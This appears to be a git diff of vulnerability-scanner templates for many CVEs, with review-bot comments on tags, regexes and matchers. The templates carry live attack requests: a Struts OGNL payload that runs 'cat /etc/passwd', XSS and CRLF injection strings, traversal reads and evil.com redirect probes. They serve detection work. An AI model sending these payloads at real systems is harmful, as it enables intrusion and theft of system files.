Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.
|
||||
reference:
|
||||
- http://www.xssing.com/index.php?x=3&y=65
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45254
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45252
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-6465
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2008-6465
|
||||
cwe-id: CWE-80
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Parallels H-Sphere
|
||||
|
@ -40,3 +43,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
||||
|
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2010-1429
|
||||
|
||||
info:
|
||||
name: JBossEAP - Sensitive Information Disclosure
|
||||
author: R12W4N
|
||||
severity: low
|
||||
description: |
|
||||
Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 allows remote attackers to obtain sensitive information about "deployed web contexts" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-1429
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-3273
|
||||
- https://rhn.redhat.com/errata/RHSA-2010-0377.html
|
||||
- http://securitytracker.com/id?1023918
|
||||
classification:
|
||||
cve-id: CVE-2010-1429
|
||||
metadata:
|
||||
shodan-query: title:"JBoss"
|
||||
verified: "true"
|
||||
tags: cve,cve2010,jboss,eap,tomcat,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/status?full=true"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "JVM"
|
||||
- "memory"
|
||||
- "localhost/"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,10 +1,10 @@
|
|||
id: CVE-2016-6601
|
||||
|
||||
info:
|
||||
name: ZOHO WebNMS Framework 5.2 and 5.2 SP1 - Directory Traversal
|
||||
name: ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the file download functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile
|
||||
description: ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile.
|
||||
reference:
|
||||
- https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt
|
||||
- https://www.exploit-db.com/exploits/40229/
|
||||
|
@ -30,3 +30,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2023/01/15
|
||||
|
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2017-11165
|
||||
|
||||
info:
|
||||
name: DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure
|
||||
author: theabhinavgaur
|
||||
severity: critical
|
||||
description: |
|
||||
dataTaker DT80 dEX 1.50.012 allows remote attackers to obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/45094
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-11165
|
||||
- https://packetstormsecurity.com/files/143328/DataTaker-DT80-dEX-1.50.012-Sensitive-Configuration-Exposure.html
|
||||
- https://www.exploit-db.com/exploits/42313/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2017-11165
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-query: http.title:"datataker"
|
||||
verified: "true"
|
||||
tags: lfr,edb,cve,cve2017,datataker,config,packetstorm,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/services/getFile.cmd?userfile=config.xml"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "COMMAND_SERVER"
|
||||
- "<loggerSettings>"
|
||||
- "config id=\"config"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/xml"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,44 @@
|
|||
id: CVE-2017-14186
|
||||
|
||||
info:
|
||||
name: FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting
|
||||
author: johnk3r
|
||||
severity: medium
|
||||
description: |
|
||||
FortiGate FortiOS through SSL VPN Web Portal contains a cross-site scripting vulnerability. The login redir parameter is not santized, so an attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks such as a URL redirect. Affected versions are 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, and 5.4 and below.
|
||||
reference:
|
||||
- https://www.fortiguard.com/psirt/FG-IR-17-242
|
||||
- https://fortiguard.com/advisory/FG-IR-17-242
|
||||
- https://web.archive.org/web/20210801135714/http://www.securitytracker.com/id/1039891
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-14186
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2017-14186
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: port:10443 http.favicon.hash:945408572
|
||||
verified: "true"
|
||||
tags: cve,cve2017,fortigate,xss,fortinet
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2023/01/11
|
|
@ -1,38 +0,0 @@
|
|||
id: CVE-2017-14186
|
||||
|
||||
info:
|
||||
name: FortiGate SSL VPN Web Portal - Cross Site Scripting
|
||||
author: johnk3r
|
||||
severity: medium
|
||||
description: |
|
||||
Failure to sanitize the login redir parameter in the SSL-VPN web portal may allow an attacker to perform a Cross-site Scripting (XSS) or an URL Redirection attack.
|
||||
reference:
|
||||
- https://www.fortiguard.com/psirt/FG-IR-17-242
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-14186
|
||||
classification:
|
||||
cve-id: CVE-2017-14186
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: port:10443 http.favicon.hash:945408572
|
||||
tags: cve,cve2017,fortigate,xss,fortinet
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,32 +4,36 @@ info:
|
|||
name: Apache Struts 2 - Remote Command Execution
|
||||
author: Random_Robbie
|
||||
severity: critical
|
||||
description: Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
|
||||
description: |
|
||||
Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
|
||||
reference:
|
||||
- https://github.com/mazen160/struts-pwn
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-5638
|
||||
- https://isc.sans.edu/diary/22169
|
||||
- https://github.com/rapid7/metasploit-framework/issues/8064
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-5638
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10
|
||||
cve-id: CVE-2017-5638
|
||||
cwe-id: CWE-20
|
||||
tags: apache,kev,msf,cve,cve2017,struts,rce
|
||||
metadata:
|
||||
shodan-query: html:"Apache Struts"
|
||||
verified: "true"
|
||||
tags: cve,cve2017,apache,kev,msf,struts,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
|
||||
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
|
||||
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
|
||||
Content-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd="cat /etc/passwd",#cmds={"/bin/bash","-c",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "X-Hacker: Bounty Plz"
|
||||
part: header
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
# Enhanced by mp on 2022/04/26
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -18,7 +18,7 @@ info:
|
|||
- http://www.openwall.com/lists/oss-security/2017/04/16/2
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-7615
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
cve-id: CVE-2017-7615
|
||||
cwe-id: CWE-640
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
reference:
|
||||
- https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-8917
|
||||
- http://www.securitytracker.com/id/1038522
|
||||
- https://web.archive.org/web/20211207050608/http://www.securitytracker.com/id/1038522
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
|
|
@ -0,0 +1,49 @@
|
|||
id: CVE-2018-11227
|
||||
|
||||
info:
|
||||
name: Monstra CMS V3.0.4 - Cross-Site Scripting
|
||||
author: ritikchaddha
|
||||
severity: medium
|
||||
description: |
|
||||
Monstra CMS 3.0.4 and earlier has XSS via index.php.
|
||||
reference:
|
||||
- https://github.com/monstra-cms/monstra/issues/438
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-11227
|
||||
- https://www.exploit-db.com/exploits/44646
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2018-11227
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:419828698
|
||||
verified: "true"
|
||||
tags: cve,cve2018,xss,mostra,mostracms,cms,edb
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /admin/index.php?id=pages HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
login="><svg/onload=alert(document.domain)>&password=xxxxxx&login_submit=Log+In
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "><svg/onload=alert(document.domain)>"
|
||||
- "Monstra"
|
||||
condition: and
|
||||
case-insensitive: true
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
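Review bot: The tag list `tags: cve,cve2018,xss,mostra,mostracms,cms,edb` misspells the product: this template targets Monstra CMS, so `mostra,mostracms` should read `monstra,monstracms`, otherwise a tag filter on the product name never selects it. The same misspelling is in the CVE-2018-11473, CVE-2018-16979 and CVE-2020-23697 sections of this commit. The `name: Monstra CMS V3.0.4 - Cross-Site Scripting` value is also reused verbatim by CVE-2018-11473 and CVE-2020-23697, so the three findings are indistinguishable in scan output; naming the injection point, e.g. `name: Monstra CMS 3.0.4 - Cross-Site Scripting (Admin Login)`, would separate them.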
@ -0,0 +1,63 @@
|
|||
id: CVE-2018-11473
|
||||
|
||||
info:
|
||||
name: Monstra CMS V3.0.4 - Cross-Site Scripting
|
||||
author: ritikchaddha
|
||||
severity: medium
|
||||
description: |
|
||||
Monstra CMS 3.0.4 has XSS in the registration Form (i.e., the login parameter to users/registration).
|
||||
reference:
|
||||
- https://github.com/monstra-cms/monstra/issues/446
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-11473
|
||||
- https://github.com/nikhil1232/Monstra-CMS-3.0.4-XSS-ON-Registration-Page
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2018-11473
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:419828698
|
||||
verified: "true"
|
||||
tags: cve,cve2018,xss,mostra,mostracms,cms
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /users/registration HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /users/registration HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
csrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test®ister=Register
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "><script>alert(document.domain)</script>"
|
||||
- "Monstra"
|
||||
condition: and
|
||||
case-insensitive: true
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: csrf
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- 'id="csrf" name="csrf" value="(.*)">'
|
||||
internal: true
|
|
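Review bot: The csrf extractor regex `'id="csrf" name="csrf" value="(.*)">'` uses a greedy `.*`, so if the token's input tag shares a line with any later `">` the captured group overruns the token and the second request is sent with a corrupt csrf value; `'id="csrf" name="csrf" value="([^"]*)"'` captures only the attribute. The same regex appears in the CVE-2020-23697 section. The extractor is not scoped to a request, so it is presumably evaluated against both responses; with `internal: true` that is harmless here, but a comment such as `# token is taken from the GET /users/registration response` would make the intent explicit.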
@ -0,0 +1,37 @@
|
|||
id: CVE-2018-16979
|
||||
|
||||
info:
|
||||
name: Monstra CMS V3.0.4 - HTTP Header Injection
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: |
|
||||
Monstra CMS V3.0.4 allows HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter.
|
||||
reference:
|
||||
- https://github.com/howchen/howchen/issues/4
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-16979
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2018-16979
|
||||
cwe-id: CWE-113
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2018,crlf,mostra,mostracms,cms
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'new line detected in'
|
||||
- 'cryptographp.php'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
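Review bot: Detection rests entirely on the body strings `new line detected in` and `cryptographp.php`, which look like PHP's warning text for a header() call that rejected the injected CRLF; on an installation with display_errors off the same vulnerable code path produces no match, so the template is blind exactly where the deployment is hardened. That limitation is worth stating in the template, e.g. `# detection relies on the PHP header() warning being rendered in the response body` above `matchers:`. Whether a complementary `part: header` check for the injected cookie is viable depends on the PHP version in use, which this template cannot see; confirm against a test instance before adding one.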
@ -7,9 +7,9 @@ info:
|
|||
description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
|
||||
reference:
|
||||
- https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-17246
|
||||
- https://www.elastic.co/community/security
|
||||
- https://discuss.elastic.co/t/elastic-stack-6-4-3-and-5-6-13-security-update/155594
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2018-17246
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -41,3 +41,5 @@ requests:
|
|||
part: header
|
||||
words:
|
||||
- "application/json"
|
||||
|
||||
# Enhanced by mp on 2023/01/15
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2018-17422
|
||||
|
||||
info:
|
||||
name: dotCMS <5.0.2 - Open Redirect
|
||||
name: DotCMS < 5.0.2 - Open Redirect
|
||||
author: 0x_Akoko,daffainfo
|
||||
severity: medium
|
||||
description: |
|
||||
|
@ -16,27 +16,22 @@ info:
|
|||
cve-id: CVE-2018-17422
|
||||
cwe-id: CWE-601
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"dotCMS"
|
||||
verified: "true"
|
||||
tags: cve,cve2018,redirect,dotcms
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh'
|
||||
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh'
|
||||
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com'
|
||||
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "self.location = 'http://www.interact.sh'"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- "self.location = 'http://evil.com'"
|
||||
- "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'"
|
||||
|
||||
# Enhanced by md on 2022/10/13
|
||||
|
|
|
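Review bot: The new word `location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'` expects `www.evil.com`, but the second path sends `hostname=evil.com`, so unless page_preview_popup.jsp prepends `www.` this entry can never match; if the page reflects the hostname verbatim the word should be `'http\\x3a\\x2f\\x2fevil\\x2ecom'`, and either way a comment naming which path each word belongs to would help. The `- type: status` matcher from the old side appears to have been dropped, so any response echoing the target string now counts regardless of status; keeping `- 200` is cheap. The redirect target is a real third-party domain; a reserved name like `example.com` or `{{interactsh-url}}` avoids sending scan traffic toward someone else's host.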
@ -11,7 +11,7 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2018-17431
|
||||
- https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2018-17431
|
||||
cwe-id: CWE-287
|
||||
|
|
|
@ -3,15 +3,15 @@ id: CVE-2018-19365
|
|||
info:
|
||||
name: Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
severity: critical
|
||||
description: Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API.
|
||||
reference:
|
||||
- https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html
|
||||
- https://www.cvedetails.com/cve/CVE-2018-19365
|
||||
- https://raw.githubusercontent.com/WowzaMediaSystems/public_cve/main/wowza-streaming-engine/CVE-2018-19365.txt
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
|
||||
cvss-score: 9.1
|
||||
cve-id: CVE-2018-19365
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2018,wowza,lfi
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
id: CVE-2019-12616
|
||||
|
||||
info:
|
||||
name: phpMyAdmin < 4.9.0 - CSRF
|
||||
name: phpMyAdmin <4.9.0 - Cross-Site Request Forgery
|
||||
author: Mohammedsaneem,philippedelteil,daffainfo
|
||||
severity: medium
|
||||
description: A vulnerability was found that allows an attacker to trigger a CSRF attack against a phpMyAdmin user. The attacker can trick the user, for instance through a broken <img> tag pointing at the victim's phpMyAdmin database, and the attacker can potentially deliver a payload (such as a specific INSERT or DELETE statement) through the victim.
|
||||
description: phpMyAdmin before 4.9.0 is susceptible to cross-site request forgery. An attacker can utilize a broken <img> tag which points at the victim's phpMyAdmin database, thus leading to potential delivery of a payload, such as a specific INSERT or DELETE statement.
|
||||
reference:
|
||||
- https://www.phpmyadmin.net/security/PMASA-2019-4/
|
||||
- https://www.exploit-db.com/exploits/46982
|
||||
|
@ -50,3 +50,5 @@ requests:
|
|||
group: 1
|
||||
regex:
|
||||
- '\?v=([0-9.]+)'
|
||||
|
||||
# Enhanced by md on 2023/01/11
|
||||
|
|
|
@ -1,16 +1,16 @@
|
|||
id: CVE-2019-14530
|
||||
|
||||
info:
|
||||
name: OpenEMR < 5.0.2 - Path Traversal
|
||||
name: OpenEMR <5.0.2 - Local File Inclusion
|
||||
author: TenBird
|
||||
severity: high
|
||||
description: |
|
||||
An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. An attacker can download any file (that is readable by the user www-data) from server storage. If the requested file is writable for the www-data user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.
|
||||
OpenEMR before 5.0.2 is vulnerable to local file inclusion via the fileName parameter in custom/ajax_download.php. An attacker can download any file (that is readable by the web server user) from server storage. If the requested file is writable for the web server user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, the file will be deleted from server.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/50037
|
||||
- https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-14530
|
||||
- https://github.com/openemr/openemr/pull/2592
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-14530
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.8
|
||||
|
@ -50,3 +50,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2023/01/15
|
||||
|
|
|
@ -2,9 +2,10 @@ id: CVE-2019-15501
|
|||
|
||||
info:
|
||||
name: L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting
|
||||
author: LogicalHunter
|
||||
author: LogicalHunter,arafatansari
|
||||
severity: medium
|
||||
description: L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
|
||||
description: |
|
||||
L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/47302
|
||||
- http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
|
||||
|
@ -14,6 +15,9 @@ info:
|
|||
cvss-score: 6.1
|
||||
cve-id: CVE-2019-15501
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: http.html:"LISTSERV"
|
||||
verified: "true"
|
||||
tags: cve,cve2019,xss,listserv,edb
|
||||
|
||||
requests:
|
||||
|
@ -24,9 +28,12 @@ requests:
|
|||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
- 'LISTSERV'
|
||||
condition: and
|
||||
case-insensitive: true
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
- https://www.tenable.com/security/research/tra-2019-03
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-3911
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2019-3911
|
||||
cwe-id: CWE-79
|
||||
|
|
|
@ -10,7 +10,7 @@ info:
|
|||
- https://www.cvedetails.com/cve/CVE-2019-3912
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-3912
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2019-3912
|
||||
cwe-id: CWE-601
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2019-6802
|
||||
|
||||
info:
|
||||
name: Pypiserver 1.2.5 - CRLF Injection
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: |
|
||||
CRLF Injection in pypiserver 1.2.5 and below allows attackers to set arbitrary HTTP headers and possibly conduct XSS attacks via a %0d%0a in a URI
|
||||
reference:
|
||||
- https://vuldb.com/?id.130257
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-6802
|
||||
- https://github.com/pypiserver/pypiserver/issues/237
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2019-6802
|
||||
cwe-id: CWE-79,CWE-74
|
||||
metadata:
|
||||
shodan-query: html:"pypiserver"
|
||||
verified: "true"
|
||||
tags: cve,cve2019,crlf,generic,pypiserver
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'Set-Cookie: crlfinjection=1;'
|
|
@ -7,9 +7,10 @@ info:
|
|||
description: Grafana through 6.7.1 contains an unauthenticated stored cross-site scripting vulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.
|
||||
reference:
|
||||
- https://web.archive.org/web/20210717142945/https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html
|
||||
- https://github.com/grafana/grafana/blob/master/CHANGELOG.md
|
||||
